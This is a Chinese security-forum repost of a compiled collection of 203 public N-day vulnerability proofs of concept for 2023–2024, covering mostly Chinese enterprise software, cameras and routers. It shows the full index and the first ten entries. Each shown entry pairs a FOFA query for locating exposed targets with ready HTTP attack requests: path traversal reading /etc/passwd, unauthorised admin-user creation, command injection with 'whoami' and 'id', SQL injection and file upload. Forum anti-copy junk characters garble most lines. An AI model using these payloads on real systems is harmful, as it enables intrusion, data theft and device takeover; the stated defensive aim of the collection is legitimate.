中国网络渗透测试联盟

标题: 互联网公开漏洞整理202309-202406--转载 [打印本页]
作者: admin    时间: 2024-6-5 14:31
标题: 互联网公开漏洞整理202309-202406--转载
互联网公开漏洞整理202309-2024068 M- X, z% V8 c* m. Z' N
道一安全 2024-06-05 07:41 北京* c6 z; K8 }/ Z7 ^6 ?" w
以下文章来源于网络安全新视界 ,作者网络安全新视界/ w  O+ X/ s0 K" s& [: u& ?' h4 Q
( d7 q. n; z  T2 d1 `% Y
发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。. V- |5 X: J% o" @% r6 s6 a

' U- s4 Y/ i! ?; z  P) [* E7 X漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。
; ?9 w% ~7 i  a' \
/ k( k" `& l8 p- J' F! V安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。% T- e4 w+ a. H

/ o8 P3 H7 c( i; n文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。
4 r! Q; f6 \0 H7 ?: ~% ?/ U4 C7 ?
3 V2 j  ^! V) u$ b, f! w: W合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。
: c5 O$ H5 U; l# w0 M8 S! p' I" y: M9 V, ?$ r- W6 w( o  M

# E4 H: H5 ]0 x8 E声明5 f  v$ B# k! c8 o+ o/ L

5 p5 s& {7 f: ^  E6 }$ A7 t1 x为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。4 K: {" R3 `% E5 v  c5 l2 }
% ?; @0 C$ W) ~1 j7 m4 A, {
有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。
* k" R+ n8 A4 t. U1 M1 Y. C8 H, E6 `" r" m, O; z; C% |/ o

( V( R5 S' [3 J- m. k/ G0 s
# F# p- ^: F: Z0 c目录
1 B' A  P, J+ L( z, T5 B, N5 v) b( y6 E( `7 q0 f% |
013 V) K. k* d3 k$ u8 f6 V, K

3 \1 [7 R. l# |  l8 l1. StarRocks MPP数据库未授权访问
+ h# n6 V$ D2 X* p2 ^7 @2. Casdoor系统static任意文件读取! }4 T- L/ H: J0 {3 X" w6 `. r
3. EasyCVR智能边缘网关 userlist 信息泄漏
5 c5 A( r  V2 H4. EasyCVR视频管理平台存在任意用户添加
* E2 `& w$ |- V4 S7 g5. NUUO NVR 视频存储管理设备远程命令执行' Y8 n3 H% V: U9 o; [1 B' @) [
6. 深信服 NGAF 任意文件读取
! h* Z9 v. ]& E7. 鸿运主动安全监控云平台任意文件下载7 \" B5 O: ]  j5 r( p# e
8. 斐讯 Phicomm 路由器RCE% b: [& l- f. k6 f  A
9. 稻壳CMS keyword 未授权SQL注入* Q# E8 u, r: `; v, P  I7 E
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
5 B1 t  u# Y1 A& ]- Q) l11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
1 U3 \4 a7 j. S1 d. _1 z8 U12. Jorani < 1.0.2 远程命令执行
& ]  X4 l, g6 ~% |# J$ d13. 红帆iOffice ioFileDown任意文件读取6 J" T& l, W/ h# K6 ?) I+ X
14. 华夏ERP(jshERP)敏感信息泄露
% p0 D! G7 ~5 o5 a. B: C15. 华夏ERP getAllList信息泄露) y5 M$ c% G, E/ `
16. 红帆HFOffice医微云SQL注入! X8 N, w9 `  l& O
17. 大华 DSS itcBulletin SQL 注入" Y+ p+ P/ Z9 _) Z
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露) q: f* X. f$ L+ R6 h1 u2 C
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入& S2 a. U& h  @; B1 t! O& t% a
20. 大华ICC智能物联综合管理平台任意文件读取
/ w1 X9 r9 W/ Z: J8 t21. 大华ICC智能物联综合管理平台random远程代码执行
  e* i: P) T+ f1 x0 i22. 大华ICC智能物联综合管理平台 log4j远程代码执行2 l7 K8 p) L% Z4 f) x5 y0 D& }
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
+ c3 U( a. M! U* ~4 l6 z; h24. 用友NC 6.5 accept.jsp任意文件上传
& B7 F% c; R* I( X* W$ l6 a' n! S! W25. 用友NC registerServlet JNDI 远程代码执行
8 `' M1 u. s8 ~9 K& O* v26. 用友NC linkVoucher SQL注入# g: u4 d( h! l5 h: L0 S
27. 用友 NC showcontent SQL注入; a4 \) o& a6 U& U
28. 用友NC grouptemplet 任意文件上传
/ e$ V% _$ D- _29. 用友NC down/bill SQL注入
1 |6 z1 C. T& w4 v( }30. 用友NC importPml SQL注入2 Q) |8 `) l. \+ p9 O, f$ A
31. 用友NC runStateServlet SQL注入
: f9 a4 o+ }) k* B" e32. 用友NC complainbilldetail SQL注入" H, C- B) b, H' Z! @2 t
33. 用友NC downTax/download SQL注入) \, \4 r+ u( d7 n! n: h4 g& U
34. 用友NC warningDetailInfo接口SQL注入' X0 w- t; Y8 p
35. 用友NC-Cloud importhttpscer任意文件上传
! s) |& ?) \/ t9 a36. 用友NC-Cloud soapFormat XXE. b" f+ k8 |4 s
37. 用友NC-Cloud IUpdateService XXE
' G0 E$ E# r5 T4 ~$ P* }38. 用友U8 Cloud smartweb2.RPC.d XXE2 ]5 l5 h9 z% F3 I  \
39. 用友U8 Cloud RegisterServlet SQL注入, A* C: d9 R7 h% [
40. 用友U8-Cloud XChangeServlet XXE: h! f" {) i6 [+ P3 D1 a) ~* O
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
1 ?9 J7 r6 ?% C, {- X42. 用友GRP-U8 SmartUpload01 文件上传, h$ g1 C0 g0 s
43. 用友GRP-U8 userInfoWeb SQL注入致RCE
. o" f$ O$ U9 P' P44. 用友GRP-U8 bx_dj_check.jsp SQL注入
; X  Q" U7 p2 [0 j! \3 E8 q45. 用友GRP-U8 ufgovbank XXE
* a. R0 m& M5 L) q" H- T46. 用友GRP-U8 sqcxIndex.jsp SQL注入
8 |7 r3 H5 p8 E47. 用友GRP A++Cloud 政府财务云 任意文件读取
' @5 I$ @4 t4 k+ R4 w  U48. 用友U8 CRM swfupload 任意文件上传, A$ B/ z; Q. U" S( r" z" E
49. 用友U8 CRM系统uploadfile.php接口任意文件上传
8 A: m$ M6 F+ F; t) a50. QDocs Smart School 6.4.1 filterRecords SQL注入
1 j4 J3 A' s: ~- k51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
- }7 Z( L; L+ v# G' `$ H52. 泛微E-Office json_common.php sql注入5 j8 Q: Y2 k4 J4 U- p- n3 \+ V2 K1 w. @
53. 迪普 DPTech VPN Service 任意文件上传% {6 |1 ~( {2 i+ j  b" `9 S
54. 畅捷通T+ getstorewarehousebystore 远程代码执行
& t0 Y) x% d* t0 E55. 畅捷通T+ getdecallusers信息泄露" x) I# S7 I8 b7 r4 ~
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
# Y2 K# o- q) i6 d$ p) ~' P57. 畅捷通T+ keyEdit.aspx SQL注入
4 V3 F/ s3 n. y% P3 W2 A58. 畅捷通T+ KeyInfoList.aspx sql注入6 X8 I+ |% |( c: L$ s7 L
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行  H' j( g4 k- a: o' L: c5 }
60. 百卓Smart管理平台 importexport.php SQL注入) \9 f( R- |6 B- u* F7 H
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传5 q+ ^- s+ w# q) X7 C7 e
62. IP-guard WebServer 远程命令执行
0 @& A4 X% c, Q63. IP-guard WebServer任意文件读取) X. w2 j4 \5 S- e0 `0 t. N; R
64. 捷诚管理信息系统CWSFinanceCommon SQL注入! ?) H' U7 j! L: |/ }7 g$ b) W5 ~
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
! }  ^7 F4 t* z# O/ s66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入6 q& J4 a5 t* q: A! ~
67. 万户ezOFFICE wpsservlet任意文件上传) f" @/ K) H/ u" E+ w1 `
68. 万户ezOFFICE wf_printnum.jsp SQL注入3 [7 l6 k$ [5 z- p
69. 万户 ezOFFICE contract_gd.jsp SQL注入- l2 m* I, b- g
70. 万户ezEIP success 命令执行1 F2 w0 f6 a1 y9 B# u# v
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入# L$ k1 N) \) R; c* u8 B0 U
72. 致远OA getAjaxDataServlet XXE
% W4 l/ r2 f7 ~' v0 _# d+ {73. GeoServer wms远程代码执行
" u0 R" m8 E' A  G* }0 I! x74. 致远M3-server 6_1sp1 反序列化RCE# _1 P7 f: ]2 V3 G) k
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE3 D, _+ S! b7 a5 f/ `) |7 X, i
76. 新开普掌上校园服务管理平台service.action远程命令执行
0 E8 F7 G# q3 T  B7 x1 l9 @77. F22服装管理软件系统UploadHandler.ashx任意文件上传5 |* J7 |7 G0 d, Q5 D5 D2 R
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
& L, y$ l  Z% O3 w0 P5 Y. k8 U79. BYTEVALUE 百为流控路由器远程命令执行) N  c9 ?: }3 T% M) f! ]  j' N6 M  d
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传4 b; [* m: d" [5 P1 @- s
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
0 K! |1 R8 p/ R+ ?5 `; K- g& {8 Z1 j82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行2 y7 X7 F- w4 z7 J
83. JeecgBoot testConnection 远程命令执行: |2 c" |, w5 X* J( K
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
5 x3 e! ]/ ?% h5 s  g& ^+ }0 H/ `! ^85. SysAid On-premise< 23.3.36远程代码执行
9 ~+ B& M1 K5 ~- ~4 `: }/ s" f86. 日本tosei自助洗衣机RCE
' n' R1 B( Q- B5 y+ e+ \% b87. 安恒明御安全网关aaa_local_web_preview文件上传& @8 E& k1 _; a$ u! K- Z& }3 z9 C
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行3 {  ~9 B4 y, K" i, w5 ^
89. 致远互联FE协作办公平台editflow_manager存在sql注入0 ~' Q6 N( n: w& o  g1 V% H
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行$ e  g$ G4 N; j5 ^; m4 @) R2 p
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取6 K* C/ J, V7 `$ R; r
92. 海康威视运行管理中心session命令执行* u* L& C/ X2 }  Z+ o7 Y' X( _
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
$ D8 }/ ?7 `) O2 Z94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传" L5 y  q9 o9 |5 N
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
! R$ s( g# {9 f, @96. Apache OFBiz  18.12.11 groovy 远程代码执行1 c% C5 E: J8 x9 @- n: M) O
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
% I- {" b1 L# L& R; L; \0 u: o98. SpiderFlow爬虫平台远程命令执行# M5 {, |0 C, J0 V! P4 @
99. Ncast盈可视高清智能录播系统busiFacade RCE) f2 d% w& t* l/ `2 D! @' w8 ~) A
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
2 P+ D7 G0 _3 q; f: E5 D101. ivanti policy secure-22.6命令注入; Q" ?* \* a0 ^' L3 ^3 z  ?2 o- b
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行  m# i4 R# D5 A
103. Ivanti Pulse Connect Secure VPN XXE
9 \  N" `3 |5 `104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
2 {9 Y* N3 T0 x9 H; l1 P5 R1 k105. SpringBlade v3.2.0 export-user SQL 注入
1 P7 t* T# i, Q% H; @106. SpringBlade dict-biz/list SQL 注入
+ H" ~) D' g% C* s$ L107. SpringBlade tenant/list SQL 注入
; k+ S* Z" S; g" N1 ], ?108. D-Tale 3.9.0 SSRF
# d8 b' h; l% ~109. Jenkins CLI 任意文件读取
  I- b6 G( P" Y& g2 d% e110. Goanywhere MFT 未授权创建管理员% E" a) S) i3 `6 M" S  J
111. WordPress Plugin HTML5 Video Player SQL注入1 C2 _2 c4 u) V7 z4 [+ b
112. WordPress Plugin NotificationX SQL 注入
: I& W6 X& ?' j/ q% ?9 h113. WordPress Automatic 插件任意文件下载和SSRF, k4 @4 q- _5 e: I  \8 K4 [
114. WordPress MasterStudy LMS插件 SQL注入
' O2 N& b, u$ G; z. o; g1 d115. WordPress Bricks Builder <= 1.9.6 RCE
+ F+ i: r) w' V1 k; n116. wordpress js-support-ticket文件上传% _+ v# f& L; r
117. WordPress LayerSlider插件SQL注入8 F) f$ @' |7 l& t0 O5 E% @
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
+ q" b) C( d- _2 |0 J% S7 j5 h4 F% t119. 北京百绰智能S20后台sysmanageajax.php sql注入% M, V3 D' L# h% q' Z3 q$ y7 p
120. 北京百绰智能S40管理平台导入web.php任意文件上传
! A+ p/ `" `! f* F8 ?1 ]121. 北京百绰智能S42管理平台userattestation.php任意文件上传
4 b; ?( I/ }5 _/ p% C! G, |122. 北京百绰智能s200管理平台/importexport.php sql注入& k& E5 }$ i7 b- q
123. Atlassian Confluence 模板注入代码执行
. Q' o6 h3 m3 K  D124. 湖南建研工程质量检测系统任意文件上传
$ q. {$ e4 {, d/ l" [125. ConnectWise ScreenConnect身份验证绕过
2 d* j/ d$ a$ I126. Aiohttp 路径遍历0 b" `9 \4 ^, y9 m+ s% ]' q
127. 广联达Linkworks DataExchange.ashx XXE/ _$ O$ o  x* p
128. Adobe ColdFusion 反序列化" e$ c1 `1 c3 c
129. Adobe ColdFusion 任意文件读取
9 `% E, M  \$ z( {) O" w" Y5 x130. Laykefu客服系统任意文件上传! R  ~5 G4 j% G4 @2 e+ p! s, h1 J2 \1 b
131. Mini-Tmall <=20231017 SQL注入
2 [* T7 C, V/ }% \, ~# |132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
4 H+ s0 I+ s* k; E" v133. H5 云商城 file.php 文件上传
6 g7 O8 k  m+ _1 }3 [9 p134. 网康NS-ASG应用安全网关index.php sql注入
4 S- n( j# T( g7 A; m5 d0 @135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
- o- G5 g( L* M136. NextChat cors SSRF
* z2 k! R+ I" O" F137. 福建科立迅通信指挥调度平台down_file.php sql注入( i, d- D* g3 x* p- m
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
8 a+ f* n2 T, v) f- L139. 福建科立讯通信指挥调度平台editemedia.php sql注入
$ Z5 U; k  Y3 x* L/ Q- l140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入3 J3 w# E; q& C# ?/ e" X: I
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入7 Q+ j  B6 a9 h) ?' c
142. CMSV6车辆监控平台系统中存在弱密码( ^; F: O, F  l1 k6 ]. c( @- B) I
143. Netis WF2780 v2.1.40144 远程命令执行0 f1 ~8 ~" m" S+ B
144. D-Link nas_sharing.cgi 命令注入9 P$ T( E- Q% {. b
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
6 \4 ]" G% ]$ E146. MajorDoMo thumb.php 未授权远程代码执行
6 |6 |3 V' H$ i1 q  \147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
2 o; ^) [4 U6 a3 d+ a  Z148. CrushFTP 认证绕过模板注入
" q- A6 [' ^  `1 Y. d# H, _& Y5 X% S) _149. AJ-Report开源数据大屏存在远程命令执行( E/ a6 |3 j4 H7 a
150. AJ-Report 1.4.0 认证绕过与远程代码执行
1 R( Q; i& I6 O/ }/ D& O4 s6 f: O( g151. AJ-Report 1.4.1 pageList sql注入! v$ {8 K. V* @8 T9 c" }2 ]
152. Progress Kemp LoadMaster 远程命令执行
: n1 y) o* \. \$ N% C5 b2 I153. gradio任意文件读取
& s( k. a0 V3 M0 S0 |- G$ |/ o+ p154. 天维尔消防救援作战调度平台 SQL注入! \4 G+ N# h2 V" e$ `
155. 六零导航页 file.php 任意文件上传0 Z! ^+ v& j5 g( `; l( _$ ]! w
156. TBK DVR-4104/DVR-4216 操作系统命令注入
; [! k2 |4 W+ _& D157. 美特CRM upload.jsp 任意文件上传2 T8 e! @3 T& C  Q# u
158. Mura-CMS-processAsyncObject存在SQL注入
; n. l: O3 E& P9 Q7 q( p+ T159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传" ?! ^* \# b# n7 v7 w& W+ B
160. Sonatype Nexus Repository 3目录遍历与文件读取
7 K0 d% {9 d) H, s( ^* K  m161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
% H+ y$ E9 @0 n4 Y7 y5 N162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传- `! N0 v" g& |- n
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传2 q0 z+ C& L7 H% s( R3 u7 I
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
3 F0 a( R" Z" G6 q  v4 D: I1 h165. OrangeHRM 3.3.3 SQL 注入
6 }' N/ P+ r, k; \166. 中成科信票务管理平台SeatMapHandler SQL注入7 V% A, v! e/ W  s: u
167. 精益价值管理系统 DownLoad.aspx任意文件读取
* |2 R9 K5 H+ u1 {$ d* W. v' ^168. 宏景EHR OutputCode 任意文件读取$ N" P" a; O( s1 O
169. 宏景EHR downlawbase SQL注入2 E7 p) o8 p; ~% o  ?( Z" t- [
170. 宏景EHR DisplayExcelCustomReport 任意文件读取
6 ?& I0 r4 a0 D1 L8 [! P171. 通天星CMSV6车载定位监控平台 SQL注入7 u1 r  f2 H" l' c+ S) M
172. DT-高清车牌识别摄像机任意文件读取8 {6 `" \( z4 G2 M! i
173. Check Point 安全网关任意文件读取
) b. g: a% C4 Q0 N0 u9 q  r174. 金和OA C6 FileDownLoad.aspx 任意文件读取6 i, V) I7 x( T
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
/ u9 j3 b5 f+ F5 d) x176. 电信网关配置管理系统 rewrite.php 文件上传2 `3 n, U* |1 }2 B3 K. j
177. H3C路由器敏感信息泄露( W9 R' J" |+ u: j: O
178. H3C校园网自助服务系统-flexfileupload-任意文件上传2 X+ r5 k7 }, q
179. 建文工程管理系统存在任意文件读取: }* i# x4 G6 K2 g! C4 h
180. 帮管客 CRM jiliyu SQL注入9 ^# Q. A  \$ C
181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
; h1 o0 x8 g# p+ D- Q3 L- g. [182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建8 K) L0 L( a) U3 j- B
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入+ Q2 y/ m# A+ `; `' y
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
. C6 V6 C% X' b8 T) @, |, l' {; q% b185. 瑞友天翼应用虚拟化系统SQL注入
) j9 g3 J! c. m/ K' ]% J8 O186. F-logic DataCube3 SQL注入5 m' O8 D" Z# ~
187. Mura CMS processAsyncObject SQL注入$ ^; ~# _6 b. d# \
188. 叁体-佳会视频会议 attachment 任意文件读取( ^0 h# s+ _5 x5 @
189. 蓝网科技临床浏览系统 deleteStudy SQL注入
) C: ?$ F4 E8 d- d7 W190. 短视频矩阵营销系统 poihuoqu 任意文件读取% j0 w2 x! ^3 |7 \& J/ O) c
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入3 g- r' W& S0 ^4 x2 l# g0 R, ~* K
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传" C& H3 l, ]4 H* I- |7 \, z& X1 w
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行8 b) t9 G1 C- d4 z0 ~
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传4 h9 C* \! x" u0 L, T
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行7 T6 Q% `% x2 W/ D; s5 N- X
196. 河南省风速科技统一认证平台密码重置
. }& J) c# o) p4 v. n3 u' s197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
* ~; Z, A1 J: N8 k9 T198.  阿里云盘 WebDAV 命令注入& T% {8 G1 d) R" C' S
199. cockpit系统assetsmanager_upload接口 文件上传) B: ]; X# i; L1 x$ P: n- ?$ X
200. SeaCMS海洋影视管理系统dmku SQL注入  R2 p+ S* @9 l- ]+ q0 D% L
201. 方正全媒体新闻采编系统 binary SQL注入4 m* @) s, g* o/ i8 C
202. 微擎系统 AccountEdit任意文件上传$ p1 w1 K0 ~, }! s- [, O# s" `2 N$ O1 D
203. 红海云EHR PtFjk 文件上传) [1 e; x& B2 _- @, [

7 o8 R! W' A" [9 uPOC列表
8 [8 w* u3 J  b% B7 U% m. d, e( I% B) \% c
02: c$ X4 K# a( Y5 z7 n) L7 s
* z6 j* B2 I) ?* ~0 h$ l
1. StarRocks MPP数据库未授权访问% I0 E' Y' F, Z) q
FOFA :title="StarRocks"
6 f) x( ~" ~+ U/ m+ m! OGET /mem_tracker HTTP/1.1+ |0 q5 x  X( _0 H% j
Host: URL: P6 m0 F3 S; d" m6 w8 L3 C8 V" Q( B& n

! a2 z2 ^% Z' ^, j- y1 B& _9 N# T0 c
2. Casdoor系统static任意文件读取
- N' Z" Z& H8 ~+ \, dFOFA :title="Casdoor"
$ b) W, x. d. [4 s' H2 x/ aGET /static/../../../../../../../../../../../etc/passwd HTTP/1.1+ z1 L& E0 m, a9 K
Host: xx.xx.xx.xx:99994 z3 z6 g+ {1 d  f9 A, t
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.363 F" h* u$ N: r7 E0 G
Connection: close" v  ]& {$ }  X( `
Accept: */*. W% X. ]. U5 A$ O5 n8 Q
Accept-Language: en
( W+ n: Z8 b, ?3 ?; NAccept-Encoding: gzip0 H/ N. s1 C$ J; G- p0 g
1 r- r$ c& |+ P4 Z& T
: q9 P) F% y, g$ {
3. EasyCVR智能边缘网关 userlist 信息泄漏% a  Q) c7 m, {1 T, a$ ~
FOFA :title="EasyCVR"
1 V% \8 R- @8 N5 a# ?+ Z3 y% pGET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
  L7 c  o7 E* ^9 M, lHost: xx.xx.xx.xx
2 _4 T8 x0 F; E. G# h1 k' @
  e: y; D8 L; Y& }" Q' ?8 m/ L* F0 X( V. n. ]1 x" s( V; W# C
4. EasyCVR视频管理平台存在任意用户添加
. T  }3 g4 s8 J* X$ a- [. f; sFOFA :title="EasyCVR"0 ?, W7 T2 K5 Z

2 a1 B& \; ?% ^1 W  A+ N' ~) epassword更改为自己的密码md5
7 V* `" F  c' H/ }POST /api/v1/adduser HTTP/1.1$ T6 i, G  B# U: A$ C8 e: r5 ]
Host: your-ip
. V( J, z% C8 a2 ^0 }/ S1 CContent-Type: application/x-www-form-urlencoded; charset=UTF-8
, D0 I& g  n) r7 z2 v8 J$ u: ?& F9 W( p' N4 B' h0 |7 B, T' \
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1, s3 ]9 t7 h0 Z4 M. s5 Y1 N

' O" I. }% U1 d" w
7 Q8 a8 X  r; }4 K6 f% h5. NUUO NVR 视频存储管理设备远程命令执行' J+ M# q3 K4 x* c5 d
FOFA:title="Network Video Recorder Login"
! T2 w. P( k) N7 g6 mGET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
, h7 |* ~( k' t( h4 ^7 ?Host: xx.xx.xx.xx& q! _4 T! G5 R+ m2 [0 a
+ D) W4 H$ L6 z9 t
, P: M  e% G; I% `
6. 深信服 NGAF 任意文件读取" R3 W0 |4 A# X  G! Q* L
FOFA:title="SANGFOR | NGAF"
2 X. d- P  `7 a2 NGET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1$ X- h& m* l: Y5 o/ v8 Z
Host:
& r) Z) A# _8 D) k5 X1 }+ E! b& P
' ]. K3 M0 ?$ t0 d4 }/ t
) i8 E, e2 B" i; H7. 鸿运主动安全监控云平台任意文件下载
; }  ~0 ]1 `' p8 k! `FOFA:body="./open/webApi.html"
; h/ x7 h! y0 G, G4 B$ x7 MGET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1% c7 @! B( c0 M) h5 K" G
Host:
; S& X" J9 w  Y( a. F( P( g- B5 Y2 X3 x% e) Y) b+ N& w

4 l4 k+ ?1 r: l8 }8 L8. 斐讯 Phicomm 路由器RCE/ x2 D) s: I# m/ u
FOFA:icon_hash="-1344736688"
- r0 U$ {# Q. A  F默认账号admin登录后台后,执行操作
. w& Z6 v0 d- o0 APOST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
  X8 l3 e9 K+ V5 C, b2 CHost: x.x.x.x% c$ q  t2 Q( ~5 B3 S
Cookie: sysauth=第一步登录获取的cookie
7 P- p' R5 \( x* rContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz& _- S. s9 F8 F8 Z
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
7 p5 G# S' ^! B. o' D  ~( Z, g! i9 b0 j0 ?, Z
------WebKitFormBoundaryxbgjoytz
+ {. ~3 H' M. P' ?% lContent-Disposition: form-data; name="wifiRebootEnablestatus"
  E+ A5 M. x  @0 e  M' s! l1 }1 y8 h$ x/ @0 v
%s8 c$ e" _* K9 x
------WebKitFormBoundaryxbgjoytz
1 k) h: ?/ M' UContent-Disposition: form-data; name="wifiRebootrange"
0 Y5 Y" Q) k9 }- i
7 ~8 S5 ]  S$ o0 r1 y. e' Y4 [12:00; id;! s. A% E) Z1 `: m1 w
------WebKitFormBoundaryxbgjoytz
* \) O. F$ ?1 E; K1 a: xContent-Disposition: form-data; name="wifiRebootendrange"5 m& x$ ~, u' m1 s/ N* [

1 J; \( H; k) d" b%s:
# r& C( o- E& y# v% a------WebKitFormBoundaryxbgjoytz
5 b  ]- C% i' Z9 f1 m: `Content-Disposition: form-data; name="cururl2"# q5 u' _; m: G6 o$ p

. ^# x( M8 W: w6 s6 x* `( z) V' X: y  i1 g3 I4 y! j/ q! J8 Q0 E
------WebKitFormBoundaryxbgjoytz--6 _1 l# P/ R( o6 s

4 E- |( @3 N" G% `
3 m8 Y* g, d; i4 P" K9. 稻壳CMS keyword 未授权SQL注入( H+ W+ ]( P! i* F
FOFA:app="Doccms"7 K3 }6 e) X  c' s, p7 e' y7 U) d
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.19 B( F& K, W5 W
Host: x.x.x.x
. O  R. k, |% y- H* g! n! n8 H: O; B$ R* |1 \

4 [1 L8 I* n: `# _" ]6 T6 o+ xpayload为下列语句的二次Url编码8 t; m% d: F5 m1 h
8 E/ f& k" g! W8 }4 H$ N- H
' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#4 M5 N) H1 z  g* R' u% D1 K
, @1 b/ {0 p. z. S! a; n
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传* ~3 P: S  p( K1 ~( v4 y0 ]5 {
FOFA:icon_hash="953405444"
& ?4 C* g( V- D7 {( F2 h7 a5 |6 f8 Z- c; L
文件上传后响应中包含上传文件的路径2 ^; J# B- Z+ K- [$ d
POST /eis/service/api.aspx?action=saveImg HTTP/1.1" B+ _+ Y# h, l' d. q; ^
Host: x.x.x.x:xx
3 I1 D; S3 G& ~. YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36* U& v, L4 T+ T- v# r# D1 P
Content-Length: 197
+ T. c1 i. ?/ T! \5 L4 GAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
( ]' Y% m% E5 J+ r# ?& Y; gAccept-Encoding: gzip, deflate
9 N3 C) x! |. w& G& C: ]Accept-Language: zh-CN,zh;q=0.9& b+ a- R$ u8 ^# \
Connection: close3 o! K4 ]: M+ s3 D+ P
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu: \. J3 S( T$ q( g3 N6 V

: ]) |6 r6 `' P# u! Y: Y3 n------WebKitFormBoundaryxdgaqmqu
# X) s: q; _) G7 fContent-Disposition: form-data; name="file"filename="icfitnya.txt"
. y* |) a' M* [9 V: T& c8 XContent-Type: text/html6 B2 E7 T( g. X0 X
" D, e  s' X: N8 C* [2 \
jmnqjfdsupxgfidopeixbgsxbf0 ?; ~2 k# q3 R6 T
------WebKitFormBoundaryxdgaqmqu--
